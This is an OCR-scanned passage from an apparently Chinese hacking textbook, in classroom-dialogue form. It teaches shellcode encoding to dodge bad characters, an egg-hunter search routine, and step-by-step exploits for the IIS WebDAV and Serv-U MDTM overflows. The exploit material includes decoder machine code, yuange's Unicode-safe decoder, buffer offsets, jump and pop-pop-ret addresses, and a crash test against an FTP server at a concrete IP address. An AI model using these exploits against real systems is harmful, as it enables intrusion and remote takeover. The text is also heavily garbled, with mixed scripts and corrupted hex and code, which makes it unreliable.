的 值 ; 通过 z 和 a， 右 得 到 b 为 b 二 z 一 a ; 然后 我 们 判断 a 和 b 是 否 符合 要 求 ， 如 果 符 合 要 求 ， 融 
把 a 和 b 打 印 出 来 ， 继 续 拆 分 下 一 个 字符 ; 如 果 不 合 要 求 ，'if(a==BadChar[j || 
b==BadChar[]7 就 要 改变 a 和 b 的 值 ， 重 新 拆 分 判断 。” 


"EX, ix UD ! 全 部 拆 分 成 功 束 表示 成 功 了 ?C 


“对 【 我们 测试 一 下 ， 假 设 不 能 含有 00、FE 和 01，ShellCode 为 \xF3\x78\xFF'"， 拆 分 的 效果 就 
如 图 5 一 14。 i 
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№2 Nx£ 1 Nx2 Sx 76 Sx2 NE d MEM 
oucceess! 
Press апу key to continue, 








"I |! F3=2+F1 ; 78=2+76 ; FF 二 2 十 FD。 果 然 生 成 符合 要 求 的 enShellCode 了 1 "Хэ 


道 。 
“ 昌 ， 那 我 们 的 解码 就 是 每 次 取 两 个 数 ， 加 起 来 复原 ? " 玉 波 说 道 。 


“对 ， 解码 的 汇编 代码 如 下 : ” 


_ asm 
{ 
lea eax,decode; 
call eax 
j 
_ asm 
{ 
jmp decode end // 为 了 获得 enShellCode 的 地 址 
decode start: 
рор ebx // 得 到 enShellCode 的 开始 位 置 esp -> ebx 
xor есх,есх 
mov cx,0x101 // 要 解码 的 enShellCode XE 
xor esi,esi //esi-0 
xor edi,edi //edi-0 
decode loop: 
mov ah, [ebx-esi] 
add ah, [ebx+esi+1] 
mov [ebx+edi],ah //0+1 放 在 0 位 中 ，2 十 3 放 在 1 位 中 ...... 
inc edi //edi 每 次 加 1 
inc esi 
inc esi //esi 每 次 加 2 
loop decode loop 
jmp decode ok // 解 码 完毕 后 ， 跳 到 解码 后 的 地 方 执行 ! 
decode end: 
call decode start 
decode ok: // 后 面 接 编码 后 的 enShe11Code 


HET 7 ВАА а 27 ЯЕ Г. KRRP, ЖАП AEA, RMF 
位 中 ; 再 取 第 2 位 和 第 3 位 相 加 ， 存 在 第 1 位 中 。 这 样 束 完成 了 解码 。” 


“最 后 ， 把 解码 的 汇编 提取 成 机 器 码 形式 的 decode。 如 下 :” 


decode[] = 
"NXEBNX1CNX5BNX33NXC9NX66NXB9NX01Nx01" 


"NXSS3NXF6NX33NXFFNX8ANX24NX33NX02Nx64" 
"NXS33NXO1NX88NX24NX3BNXA7NXA6NXA6NXE2" 
"NXFANXEBNXOBNXE8NXDFNXFFNXFFNXFF" 


“有 了 编码 和 解码 的 代码 ， 大 家 下 来 就 可 自己 测试 了 。 还 是 先 用 编码 程序 把 ShellCode 编 码 ， 
得 到 enShellCode， 再 把 decode 放 在 前 面 ， 得 到 完整 的 程序 后 执行 ， 看 看 最 终 效 果 。” 


测试 ! 还 是 成 功 了 | 


“不 错 ， 不 错 ， 这 种 思路 很 巧妙 |” K aK toa E 

“还 是 那 句 话 ， 没 有 十 全 十 美的 方法 。 这 种 方法 的 缺点 是 : 较 小 的 数 拆 分 的 方式 较 少 ， 像 0x07 
这 样 的 数 ， 融 有 可 能 无 法 找到 符合 条 件 的 组 合 。” 

“当然 ，decode 代 码 中 仍 有 可 能 合 有 不 合 要 求 的 字符 ， 在 这 种 情况 下 就 需要 采用 微调 的 方法 改 


` 


变 ， 如 果 微 调 也 无 效 ， 那 焉 可 能 需要 换算 法 了 。” 


5.5.2 方法 二 0хАВ=0хА*0х10+0хВ 
衬 强 对 小 倩 说 :“ 有 了 和 的 拆 分 法 ， 我 认为 也 可 以 有 乘积 的 拆 分 法 。” 


果然 ， 老 病 说 道 : "还 有 第 二 种 字符 拆 分 法 ， 融 是 把 ShellCode 的 每 个 字符 拆 分 成 两 个 效 的 乘 
积 。 上 比如 0xAB 拆 分 成 0xXA 和 0xB， 恢 复 时 是 0xAB=0xA*0x10+0xB。” 


“IR | (i£ 4719 ! "小 倩 转 头 看 了 看 于 强 。 
“ШП, ЕЩ! " 宇 强 高 兴 的 说 , “小 时 候 我 把 聪明 存 了 起 来 ， 所 以 我 现在 悟性 高 咏 ! ” 
“什么 啊 ， 给 你 点 阳光 束 灿 烂 |” J 5368 351836. 


老病 在 台 上 说 , “对 于 这 种 方法 的 使 用 ， 我 们 看 一 个 实际 的 漏洞 WebDav 漏 洞 。” 





5.5.3 实际 运用 一 WebDav 漏 洞 编 写 
“WebDav 洽 出 漏洞 是 IIS 漏洞 的 一 种 ， 要 利用 它 有 一 定 的 难度 1， 
“ 哦 ， 比 较 难 啊 ? 难 在 什么 地 方 呢 2" 


“了 呵呵 ， 我 们 一 起 往 下 走 束 知 优 了。 虽然 比 较 困 难 ， 但 搞 清 楚 之 后 对 大 家 的 思路 扩展 是 很 有 好 
处 的 1” 


“ 哦 1 好 Yeah1” 
小 知识 : 


IIS5 默认 提供 了 对 WebDAV 的 支持 ， 通 过 WebDAV， 可 以 利用 HTTP 向 用 户 提 供 远程 文件 存储 
的 服务 。1IS 5.0 包 含 的 WebDAV 组 件 不 充分 检查 传递 给 部 分 系统 组 件 的 效 据 ， 远 程 攻击 者 利用 
这 个 漏洞 对 WebDAV 进 行 缓冲 区 浴 出 攻击 ， 可 能 以 WEB 进 程 权限 在 系统 上 执行 任意 指令 。1IS 
5.0 的 WebDAV 使 用 了 ntdll.dll 中 的 一 些 函 数 ， 而 这 些 函 效 存 在 一 个 缓冲 区 洽 出 漏洞 ， 通 过 对 
WebDAV 的 畸形 请 求 可 以 触发 这 个 浴 出 。 成 功利 用 这 个 漏洞 可 以 获得 LocalSystem 权 限 。 这 意 
味 着 和 人 侵 者 可 获得 主机 的 完全 控制 能 


“这 个 漏洞 还 是 很 有 用 的 吧 ! 而 且 在 Win2000 SP3 中 也 有 这 个 漏洞 哦 1 ” 
“这 个 漏洞 产生 的 机 理 相 当 复 杂 。 我 简单 的 说 吧 |! 发 出 如 下 请 求 时 ，1IS 就 会 把 buffer 加 上 几 个 
字 节 的 路 径 ， 作 拷贝 操作 。” 


SEARCH /[buffer] HTTP/1.0 
Host: XXX 

Content-Type: text/xml 
Content-length: 3 

XXX 


“在 拷贝 中 没有 作 边 界 检 查 ? MAE ? "同学 们 问 道 。 


“不 ， 在 拷贝 前 是 作 了 检查 的 ! 而 且 很 严格 ， 用 变量 Length 保 存 长 度 ， 如 果 Length 超 过 了 8， 
那 就 不 作 拷贝 1? 


“ 哦 ? 那 怎么 引发 浴 出 的 呢 ?” 


“了 呵呵， 这 惑 是 此 漏洞 的 第 一 个 奇妙 之 处 。 虽 然 程 序 先 计算 出 长 度 ， 保 存在 Length 中 ， 但 
Length 是 无 符号 短 整数 类 型 ， 只 能 存 65535。 但 是 ， 我 们 的 'buffer 可 以 超过 65535 的 限制 ， 那 
Length 融 无 法 容纳 ， 融 会 浴 出 。 例 如 当 路 径 长 度 是 65536， 那 么 ，Length 融 变 成 0 了 ， 捞 贝 前 
的 判断 就 为 真 ， 从 而 可 以 拷贝 了 。 在 拷贝 时 ，'buffer' 实 际 是 65536 那 么 长 ， 当 然 浴 出 了 !" 


"Hx ! 的 确 很 奇妙 啊 1 ” 


“这 个 瀹 出 从 本 质 上 说 是 一 个 短 整 型 数 渝 出 ， 而 后 导致 了 堆栈 渝 出 。 这 一 点 是 值得 研究 的 。” 


“好 ， 我 们 继续 。 Виѓег 655358 L S m HH, An =й 5| RRS. TOU MIB 
A, Fj HR 9 1 H Exploithgze JZBB 1” 


“第 一 步 : 异常 处理 点 的 位 置 。 在 Buffer 第 266 的 位 置 左右 ， 这 里 要 注意 ， 是 左右 哦 1” 
“第 二 步 : ShellCode。 现 在 可 以 用 现成 的 ， 也 可 以 用 我 们 目 己 写 的 。 融 加 个 帐户 吧 1" 
“第 三 步 : Јтр /call ebx 的 地 址 一 一 先 用 0x7FFA1571 试 试 。” 

STF, "HAAT, "为 什么 在 266 位 置 左右 呢 ? 不 能 精确 吗 ?” 


“这 就 是 此 漏洞 的 第 二 个 奇妙 之 处 。 刚 才 说 过 ，11S 会 把 "buffer 加 上 几 个 字 节 的 路 径 后 作 拷 贝 。 
但 那个 路 径 会 因为 机 器 不 同 、 安 妆 目 录 不 同 而 引发 长 度 不 一 样 ， 所 以 不 能 统一 。 比 如 ， 我 的 
IIS 安 装 在 Ci\inetpub\Wwwwroot 下 ， 那 Buffer 要 长 度 正好 是 269 才 能 到 达 异 常 处 理 点 。” 


“真是 越 来 越 麻 烦 了 1!” 

的确 ， 但 这 都 是 小 问题 ， 实 际 中 改变 长 度 多 试 几 次 融 可 以 了 了。 真正 的 考验 还 在 后 面 呢 |" 
"TE 1 "大 家 都 吓 住 了 。 

“大 家 要 获得 技术 的 突破 ， 一 定 要 有 耐心 和 毅力 ， 不 要 怕 ， 我 们 继续 ! 

“不 用 担心 ， 大 家 一 定 可 以 解决 的 ! "老病 努 力 给 大 家 打气 。 

“ш | 我 们 一 定 要 把 它 解决 1” 大 家 都 气势 如 宏 ,， “我 们 写 出 Exploit 的 初步 构造 吧 ! 如 图 5 一 


15, » 


SEARCH /  [buffer(»65513 bytes)] HTTP/1 0 
LE OE 


2667-4 Tr NOP Imp04 Impebx ShellCode 
ЧА у i] q 3, it Bux 2? "同学 们 都 望 着 老病 。 
“呵呵 ! 不 急 ， 我 们 一 步 步 的 来 。 回 想 一 下 以 前 讲 的 IDA/IDQ 漏 洞 ， 我 们 作 了 什么 义理 ?” 


“对 哈 1 11S 会 作 变换 成 宽 字 节 的 处 理 ! "同学 们 叫 了 起 来 ，" 我 们 应 该 加 上 '%u' 防 止 被 扩展 变 
化 1 


“我 们 先 把 JMP 04, JMP EBX 地 址 和 ShellCode 都 加 上 '%U'? 试 试 。” 
“好 哩 1" 古风 把 '%uw 加 了 上 去 ， 这 是 他 的 强项 ! 

“OK， 运 行 一 下 试 试 1” 

ж. WT, =F. 


“果然 没 那么 简单 。 "证 风 目 言 目 语 道 。 


“m, ЗХ EGBEARIDA/IDQ^ ај, IDA/IDQ Ж m %u Efe, ТУЛА Ла ШЕЕ $i friUnicodes& 
ж ; 而 Webdav 是 “%u' 也 要 作 Unicode 转 换 ， 但 过 后 要 转换 回 单字 节 。” 


“小 于 0x80 单 字 节 字符 转换 时 会 被 转换 成 XXX\X00 ' 的 形式 ， 然 后 又 被 转换 回 XX'， 可 以 不 变 ; 
但 大 于 0x80 的 ， 系 统 会 认为 后 面 还 有 一 个 字 节 的 字符 ， 和 与 这 个 字符 一 起 组 成 一 个 完整 宽 字 
符 ' 来 作 转 换 。 上 比如 ，^\x61\x81\x81' 会 被 转换 为 X61\xX00\xXXX\xXXX' ; 如 果 不 合 编码 规范 ， 转 回 
来 时 ， 就 变 成 \X61\xXXX\xXXX"， 而 不 是 原来 的 \x61\x81\x81? 了 。” 


“所 以 问题 就 在 于 转换 。 小 于 0x80 的 会 符合 要 求 ; 但 大 于 0x80、 不 符合 编码 范围 的 就 会 被 替换 
је | 转换 完毕 后 ， 当 然 就 不 是 我 们 想 要 的 字符 串 跑 ! ” 


"E | 这 样 啊 1” 
“这 就 是 该 漏洞 的 第 三 个 奇妙 之 处 。 大 家 想 想 怎么 办 ? "老病 又 开始 让 同学 们 开动 脑筋 了 。 


“如 果 不 符合 编码 沁 围 ， 会 被 改变 ; 那 我 们 把 JMP 04, JMP EBX 的 地 址 和 Shellcode 都 使 用 符 
合 编码 范围 的 字符 吧 ! " 衬 强 思考 后 说 。 


"m | 很 好 1! 思路 就 是 这 样 ， 我 们 使 用 符合 编码 范围 的 字符 。 这 样 ，\XXX' 在 转换 成 宽 字 节 后 ， 
BA 3E WOXOQx00'T ; 再 被 转换 回来 ， 束 又 成 了 \xXXX'"， 不 会 被 改变 。” 


“但 大 家 想 想 ，JMP 04, JMP EBX 的 地 址 符合 规 邯 比较 容易 ，Shellcode 也 可 用 前 面 的 方法 
(比如 替换 法 ) 进行 编码 ， 但 要 decode 全 部 都 符合 编码 要 求实 在 是 太 困 难 了 。” 


ORI ! 难于 上 青天 啊 ! "大 家 感 双 道 ，“ 那 怎么 办 啊 ?” 

“这 里 ， 我 给 大 家 再 介绍 一 位 前 辈 级 的 人 物 一 yuange ! 他 提出 的 解决 办 法 如 下 : ” 

1. 把 real shellcode 编 码 成 小 于 0x80 的 字符 。 这 样 ， 在 经 过 转换 后 融 成 为 \XXX\X00' 了， 字符 不 
会 被 改变 。 

2. 再 精心 编写 一 段 符合 编码 范围 的 代码 ， 用 这 些 代 码 来 解码 上 述 经 过 编码 的 real shellcode | 
“7?” 


“yange 提 出 的 具体 算法 就 是 : 编码 时 把 shellcode 的 字符 0xXY 变 成 0xX0X 和 0x0Y， 这 样 一 定 可 
以 符合 小 于 0x80 要 求 ; 而 在 解码 中 ， 用 0xa*0x10+0xb=0xab 的 算法 来 恢复 。” 


“而 解码 的 代码 是 yuange 精 心 打 造 的 ， 全 部 符合 简体 中 文 编码 范围 要 求 的 CPU 指令。 大 家 看 看 
吧 1” 


"%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f '' 
"%u66ad%u4e3d%u7400%u9023%u612c%u5090%u6659%u90ad" 
"%u612c%u548d%u7088%u548d%u908a%u548d%u708a%u548d" 
"%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3" 
"%u6099"; 


"EE 太 强 了 1 "大 家 都 面 带 钦佩 之 色 。 


“是 啊 ， yuange x 这 样 的 人 才 算 各 叶 上 真正 的 黑客 啊 ! 技术 高 超 ， 而 且 无 私 共 他。 
“8 ! 同 yuange 学 习 ! 同 yuange 致 敬 1" 大 家 发 出 由 囊 的 呐喊 。 


EMRE :“ 下 面 我 们 把 Exploit 完 成 吧 ! 我 们 先 把 ShellCode 用 yuange 的 算法 进行 编码 ， 实 现 
的 算法 就 是 :” 


unsigned char ShellCode[] = 
"\х81\хЕ4\хЕ2"; 
unsigned char enShellCode[200]; 
int main() 
int i,nLen; 
unsigned char temp; 
nLen = sizeof(ShellCode)-1; //ShellCodeXJ/£€ 
for(i-z0;i«nLen;i-t-*) 
{ 
temp=Shellcode[i]; 


enshellCode[2*i] = temp/0x10; 
enShellCode[2*i+1] = temp%0x10; // 把 909xab 拆 分 为 Oxa、0xb 并 保存 


“把 ShellCode 编 码 成 符合 要 求 的 EnShellcode 后 ; 在 EnShellCode 前 放 上 解码 代码 DeCode， 
功能 是 把 EnShellCode 解 码 还原 成 真正 的 ShellCode， 并 跳 过 去 执行 1 格式 如 图 5 一 161” 
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266 左 右 个 NOB lmn 04 Imnehx DeCode En&hellCode 
“注意 ， 我 们 还 要 把 JMP EBX 地 址 用 符合 规范 的 0x695c6772 代 替 ，JMP 04 用 0x58685159 来 代 
& ! 这 样 束 全 部 符合 编码 的 规 沁 了 1” 
“IE | 还 真 不 容易 。” 大 家 擦 探 汗 。 
“ 阿 呵 1 这 是 写 浴 出 时 常用 的 技巧 。 我 们 看 看 成 果 吧 ! ” 
编译 、 执 行 ! 成功 了 ! 
“ 哦 1" 大 家 都 欢呼 了 起 来 ， 经 过 无 数 的 困难 下 取得 的 成 功 是 最 甜美 的 。 


“看 来 大 家 都 很 有 兴趣 ， 那 我 们 继续 同 困 难 挑战 ， 讨 论 更 困难 情况 下 的 处 理 办 法 
法 。” 


内 存 搜 索 





5.6 内 存 搜索 法 

“我 们 掌握 了 这 么 多 种 编码 方法 ， 可 以 避免 很 多 刁钻 的 字符 限制 了 ， 为 什么 我 们 还 要 学 习 内 存 
搜索 法 呢 ? " 玉 波 又 问 道 。 

“学 无 止境 ， 学 海 无 涯 1 ”老病 简单 的 回 了 一 句 。 


“但 更 重要 的 是 ， 上 面 讲 的 那些 方法 都 只 是 考虑 如 何在 ShellCode 中 如 开 一 定 的 特殊 字符 ; 但 
现实 中 有 一 些 漏洞 远 远 没 那么 简单 。” 


5.6.1 搜索 的 原因 X RE BR ll 
老 羡 说 : “比如 一 些 漏洞 ， 对 ShellCode 的 长 度 也 有 一 定 的 限制 。” 





“长 度 也 有 限制 ? 啊 ? "大 家 都 悄 了 ,，“ 像 拆 分 法 那样 变换 肯定 行 不 通 了 ， 越 拆 越 长 1” 
“对 ! 这 融 是 真正 麻烦 的 地 方 。" 老 评说 道 ,“ 遇 到 长 度 有 限制 的 漏洞 时 一 般 有 两 种 解决 思路 。” 


“一 种 方法 是 找 比 较 短 的 ShellCode， 但 可 能 比较 困难 ， 功 能 也 有 限 ; "老病 说 道 ,“ 另 一 种 方法 
mie: 只 做 一 个 短 的 搜索 ShellCode 的 代码 ， 真 正 的 ShellCode 放 在 内 存 的 其 他 地 方 ， 这 是 我 


们 着 重 讲 的 部 分 。” 

“7?” 

* 澄 出 后 下 搂 运 行 的 是 搜索 ShellCode 的 代码 ， 其 功能 是 在 内 存 中 查找 真正 的 ShellCode， 查 找 
到 后 融 跳 过 去 执行 。” 

“因为 搜索 代码 一 般 可 以 很 短 ， 所 以 能 满足 长 度 限 制 的 要 求 。” 

“搜索 代码 ? "同学 们 觉得 又 有 新 知识 可 学 了 ,“ 如 何 完 成 搜索 的 呢 ?” 


“一 般 说 来 ， 搜 索 从 某 个 接近 ShellCode 的 地 址 开始 ， 依 次 查找 ， 当 找到 某 个 预定 标志 的 时 
候 ， 融 说 明 找 到 了 我 们 的 ShellCode。” 


5.6.2 搜索 的 原理 一 一 查找 标志 


“我 们 用 图 来 理解 一 下 。 在 内 存 中 ， 坟 表示 垃圾 字符 ; ‘Ret 表 示 JMP ESP 或 者 JMP 04 Call 
EBX， 反 正 功能 是 要 跳 转 到 后 面 的 Search 中 ; 然后 'F’ 为 标志 ， 最 后 是 ‘ShellCode’”。 Search 功 
能 束 是 要 进入 到 原来 的 ShellCode 中 ， 原 始 的 发 送 和 目标 程序 处 理 稚 断后 的 数据 如 图 5 一 17。” 





AAAAAAAAAAA Ret Search F ShellCode 
ААААААААААА' Ret Search Е" ShellCode' 


"fEEJ5— 17", AMA EME, Яе ; ‘Ret' 和 'Search' 一 定 要 符合 规 泥 ， 不 能 被 改 
变 ; F' 和 ' 和 F” 一 定 要 不 一 样 ， 如 果 一 样 ， 就 无 法 区 分 原始 ShellCode 和 截断 后 的 数据 位 置 ; 

而 'ShellCode' 和 'ShellCode”" 是 不 一 样 的 ， 如 果 一 样 ， 我 们 融 不 用 花 这 么 大 的 力气 去 写 一 个 符 
合 规范 的 Search 和 跳 转 了 。” 


“好 ， 我 们 看 看 Search 的 代码 该 如 何 写 。 假 设 标 记 'F 为 ww08， 即 0x773037， 而 且 从 esp 开 始 
搜索 ， 则 搜索 的 汇编 代码 如 下 : ” 


| asm 
{ 
mov ebx, esp // 从 esp 开 始 搜索 
mov еах, 0х77773037; //eax = ww07 
inc eax // 刚 才 是 ww07， 加 1 变 成 ww98， 免 得 搜索 成 自己 
loop1: 
inc ebx 
стр [ерх], eax // 比 较 是 否 是 ww08 
jne 1оор1 
inc ebx 
inc ebx 
inc ebx 
inc ebx 
call ebx // 找 到 ww98 标 志 ， 跳 过 去 执行 
} 


“大 家 注意 啊 1 先是 把 eax 赋 成 ww07， 然 后 eax 加 1， 才 得 到 ww08。 这 是 为 了 避免 搜索 成 
search 代 码 目 己 。” 


“EW! 如 果 是 下 接 mov eax, 0x77773038 ， 搜 索 经 过 这 里 会 补 认为 是 标志 的 1” 宇 强 说 道 。 


“非常 正确 ! 我 们 清楚 原理 了 ， 来 看 一 个 实际 的 漏洞 吧 一 一 Serv_U 的 MDTM 漏 洞 。” 


5.7 搜索 实例 一 一 Serv_U 漏 洞 的 利用 


“Serv_U 是 常见 的 Windows 下 架设 FTP 服 务 的 软件 ， 非 党 好 用 ， 功 能 也 很 强大 。” 老 病 说 ，“ 很 
多 的 电影 、 首 乐 服务 器 都 是 用 Serv U 来 架设 的 。” 

“ 哦 ?了 它 有 漏洞 可 以 利用 吗 ?”" 台 下 流出 了 一 瘫 瘫 的 口水 。 

“当然 有 ! TARM SAWIT, Жар l” 


5.7.1 利用 Ollydbg 定 位 渝 出 点 


“首先 ， 我 们 还 是 看 看 漏洞 的 公告 和 原因 ， 如 图 5 一 18。” 老 炳 说 道 
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ЗАР PF JS 2 2: 

FhinoSoft seru-U 5. .0 
RhinoSoft sery-U Ч. x 
Rhinosoft Serv=Ü 3, x 
RhinoSoft serv-U 2. x 


景 近 执 露 了 3ectv-U TTP 服务 器 的 APET ЯНЕ, Sor,-U FTP 服 当 器 在 四 内 应 用 北 带 广泛 ， 针 对 该 漏洞 的 攻击 代码 已 经 开 
BAE. ангаа лсана ТЕРАГА ИОВ ОЦ, За Сла Матра е дА 


PTE EERE ОРЕН EA. Sev U 是 Windows 平 台 下 一 个 流行 的 FTr 服 务 器 软件 。5Se-v EBETA «оти ”用 于 
用 户 更 改 文件 时 间 。 


©сгу-1НЕАЕНВ “MDTI“ 侧 全 的 基数 时 缺少 正 确 的 生生 区 边界 术 查 ， 远 程 表 击 者 可 以 利用 这 个 调调 对 FTP 服 党 程序 进行 梭 种 区 答 
HE, RISRLIFTPREREASER ££ 5t LTES T. 
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“Ж та -E- 9G; Serv. UTE A TMDTM fip 5 HT 78 X Hd, MDTM HIT ZA fip D ? ”同学 们 问 
道 。 
“Serv_U 是 FTP 的 服务 器 ， 当 然 人 遵守 FTP 协 议 的 规范 ， 但 也 有 自己 的 一 些 独特 命 合 和 功能 。” 


“任何 FTP 服 务 器 都 是 这 样 的 。 而 MDTM 命 命 是 关于 文件 时 间 的 命 爷 ， 它 可 查看 文件 的 时 间 ， 
如 MDTM /ww0830.txt ， 也 可 修改 文件 的 时 间 ， 如 quote mdtm 20020102112233+123 
/Ww0830.txt , " 


“ 当 用 MDTM 命 令 修 改 文件 的 时 间 时 ， 如 果 参 数 过 长 ， 融 会 引发 标准 的 堆栈 浴 出 ! ” 


“我 们 先 来 引发 一 下 这 个 漏洞 ， 我 们 登陆 Serv_U 的 服务 器 ， 先 输入 用 户 名 和 密码 ， 注 意 ， 该 漏 
洞 没 有 权限 的 帐号 都 可 以 利用 。 这 里 是 用 匿名 登陆 的 。， 


“然后 输入 MDTM 命 全 和 超 长 参数 ， 项 回 车 ， 如 果 对 方 有 漏洞 ， 服 务 器 就 会 挂 挤 。 如 图 5 一 
19。 





c C:\FINDOFS\Systenmnjz2\cad. exe 一 ftp 211. 83. 154. 120 


G: s2ftp 211.83.154.120 
Connected to 211.83.154.128. 
220 ырын м! FIF Server у4. И for WinSack ready... 
User <211.83._154.12B: <попе2 2: anonymous 
Jser name okay. please send complete E-mail address as password. 


IPassword: 

230 User logged in, proceed. 

ftp» guote MDIM 198111B21"2280B+11 _ _22223333444455556666? M 888899990ñBñBññ01111222233 
B344445555666677778888 a 

Connection closed by remote host. 


Ftp» 





“果然 服务 挂 了 啊 ! 真 想 不 到 ， 看 起 来 不 起 眼 的 参数 小 漏洞 ， 都 有 可 能 造成 系统 被 攻破 啊 1 "S 
下 说 道 。 
“千里 之 堤 ， 毁 于 蚁 呈 ， 束 是 这 个 道理 。” 老 证 接 着 说 ,“ 我 们 来 利用 它 吧 ! BE 


5 
JNO 


“但 这 里 没有 弹出 出 错 对 话 杠 啊 1 怎么 用 对 话 框 的 方法 定位 呢 ?” 
小 知识 : Ollydbg 


OllyDbg 是 一 个 32 位 汇编 级 的 直观 分 析 调 试 器 。 是 个 非常 好 的 动态 跟踪 调试 工具 ， 和 TRW.、 
SOFTICE 相 比 ， 没 有 工作 在 核心 态 ， 可 边 调 试 边 进行 其 他 应用 程序 工作 ， 上 比如 了 听 歌 、 查 资 
料 。 界 面 非 常人 性 化 ， 调 斌 方便， 可 以 随意 加 注释 、 复 制 、 跟 踪 堆 栈 的 变化 。 还 有 强大 的 右 
键 功能 ， 使 用 起 来 特别 方便 。 


“对 于 这 种 漏洞 ， 我 们 就 要 用 调试 利器 Ollydbg 了 (光盘 有 收录 ) | "老病 说 道 ,“ 重 新 启动 
Serv_U， 运 行 Ollydbg， 并 附加 到 Serv_U 的 进程 。 方 法 是 在 Ollydbg 的 'File' 菜 单 下 选 
中 'Attach'， 如 图 5 一 20。” 





OllyDbg — [CPU] 


GEM View Debug Plugins Üptions Window Help 
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= 
Exit Álttz 
1 C: WINDOWSXexplorer. exe CtrltF2 


2 F:AStudy IB UIS ММ E wMs04-028JPEG2S i E УЕН SpOB dll kernel32. 411 
3 Е: Study MI ЕДТ [> Ws04-028JFEG2S e 7E Sr EEUU PRA ров d11*GdiPlus. dll 
4 F: Study IZB5 SR ЧЕ E wMs04-028JPEG2S 75 ЕРЕЦ SpOB dl int dll. dll 





“然后 在 弹出 的 进程 对 话 框 中 选中 'ServUDaemon'， 并 点 中 'Attach'。 这 样 ，Ollydbg 就 加 载 了 
Serv_U 进 程 ， 如 图 5 一 21。” 
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“加 载 后 Serv_U 会 被 暂停 ， 我 们 按 F9 让 Serv_U 继 续 运 行 起 来 。” 老 病 一 步 步 的 演示 起 来 。 


“好 ， 我 们 再 登陆 ， 输 入 MDTM 命 信和 超 长 的 参数 。Serv_U 又 挂 挥 了 ， 但 Ollydbg 截 获 了 出 现 
常 ， 在 状态 栏 上 显示 了 Access violation when reading [34343435] ， 如 图 5 一 22。” 
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| Far ан" 


"lik 1 是 0x34343435 地 址 不 可 读 1 "大 家 说 道 。 


“对 ，0x34343435 是 我 们 输入 的 过 长 参数 。 它 把 Serv_U 程 序 要 用 的 变量 履 六 了， 当然 会 有 异 
eI." 


"HX? 8| E TRE? RERNA m tH ААЙ sa BJ Л ZAR FH. ? "E58 je] 28 


“是 啊 1 "老病 说 道 ，“ 更 进一步 ， 我 们 用 Ollybug 定 位 异常 处 理 点 吧 ! 按 ShifttF9 进 入 异常 处 
理 ， 吧 ?又 报错 了 ，[34343434] 不 能 执行 。 如 图 5 一 23。 


5.7.1 利用 Ollydbg 定 位 浴 出 点 263 
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"I ! 0x34 融 是 十 进 制 的 4， 也 是 我 们 输入 的 参数 ，" 同 学 们 说 道 , “看 来 我 们 可 以 控制 这 里 要 执 
了 的 0x34343434 哦 ! " 
“对 上 工 其 实 这 里 的 0x34343434 珊 是 异 前 处 理 人 口 氮 。 "608, 


“ 哦 ? 那 ebx 应 该 是 指向 它 前 方 的 数 了 ?3 "大 家 想起 前 面 讲 过 的 
24, 


RAH 
E 


异 剃 处 理 点 的 方法 ， 如 图 5 一 


ЕНТ | 异常 处 理 点 


0x3333333 0x34343434 





“异常 你 理 程序 的 入 口 是 0x34343434， 那 么 ebx 应 该 是 指向 0x33333333 ? " 宇 强 说 了 这 和 句 话 
后 ， 大 家 仔细 看 了 看 Ollydbg 的 寄存 器 窗口 。 


“I? ebx 怎 么 是 0 啊 ? "大 家 都 很 吃惊 , “ix A xE fu ЩЩ?” 


“在 Windows 2000 下 作 异 党 处 理 时 ，ebx 的 确 是 在 异常 处 理 程序 入 口 的 前 方 ; ”老病 说 道 , “但 
在 XP 下 ，ebx 会 变 为 0， 我 们 就 要 用 另 一 种 方法 定位 了 。 


5.7.1 利用 Ollydbg 定 位 浴 出 点 264 


5.7.2 XP 下 SEH 的 利用 


“好 ， 我 们 看 看 ， 本 来 ebx 应 该 指向 0x33333333， 我 们 CALL EBX 就 可 跳 到 0x33333333 那 句 指 
令 。 但 在 XP 下 这 招 不 行 ， 要 用 另 一 种 方法 了 。 


"08 2 什么 方法 呢 ?， 


“呵呵 ， 系 统 总 要 知道 指向 下 一 个 异常 处 理 点 的 位 置 嘛 1 大 家 仔细 找 找 看 ， 寄 存 器 或 寄存 器 内 
存 附 近 有 什么 指 兮 a 


大 家 仔细 的 找 了 起 来 。 


ha | esp 十 8 的 值 为 0x0101D2DC， 而 0x0101D2DC 存 的 正好 是 我 们 的 0x33333333， 如 图 5 一 
” 眼 尖 的 小 倩 说 道 。 
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“是 啊 1 "其 他 人 也 欢呼 道 , “原来 是 堆栈 中 存 着 地 址 啊 ， 而 且 是 栈 项 十 8 的 地 方 。 那 XP 下 可 以 用 
这 个 地 方 来 下 位 了 ! 


“是 的 ! 这 束 是 XP 下 利用 异常 处 理 点 的 方法 。" 老 病 说 道 ,，" 我 们 把 CALL EBX 指 邻 的 地 址 改 成 
pop pop ret 指 邻 的 地 址 ; 当 执 行 pop pop ret 后 ， 就 会 到 异常 处 理 点 程序 入口 点 前 方 的 位 置 ， 
我 们 把 那儿 覆盖 成 JMP 04， 融 可 跳 到 后 面 的 ShellCode 了 。 如 图 5 一 26。 


ОЛ zx HX G ДЕ 


SEH 下 一 结扎 | 异常 处 理 点 
JMP 04 eni 





“好 了 ， 无 用 字符 应 该 填充 多 少 个 呢 ? "老病 问 道 。 


“刚才 我 们 定位 时 ， 输 入 的 参数 是 11112222 到 0000 的 不 断 循 环 ，Ollydby 里 显示 的 出 错位 置 是 
第 二 个 3333 和 4444， 所 以 我 们 可 以 算出 12x4 二 48， 加 号 要 占 一 个 字符 ， 所 以 上 应 该 是 MDTM 命 
合 加 号 后 再 填充 47 个 字符 到 达 异 党 处 理 点 。” 宇 强 分 析 道 。 


"Mese l| Perfect ! ”老病 表扬 道 ， 我 们 利用 的 示意 图 束 应 该 如 图 5 一 27。” 


SEH 下 一 结 点 ТЕ, ЛЕШ да 
JMP 04 POPPOPRET 的 地 址 











“pop pop ret 指 使 在 Windows 下 通用 的 地 址 是 0x7FFA1571 ; JMP 04 的 指令 是 EB 04, "ZJ R 
后 说 道 ,，“ShellCode 我 们 就 随便 使 用 一 个 现成 的 ， 或 我 们 自己 写 的 束 行 ， 所以， 具体 构造 应 
该 如 图 5 一 28。” 


SEH 下 一 结 点 | 异常 处 理 点 





字符 | Мор nop EB04| 0x7FFA1571 





"Bn 1 我 们 快 试 试 吧 1 ?同学 们 急切 的 说 ,“ 先 填充 字符 ， 再 JMP 04， 然 后 是 0x7FFA1571， 
最 后 是 我 们 的 ShellCode， 就 开 一 个 远程 端口 吧 ! 运行 1” 


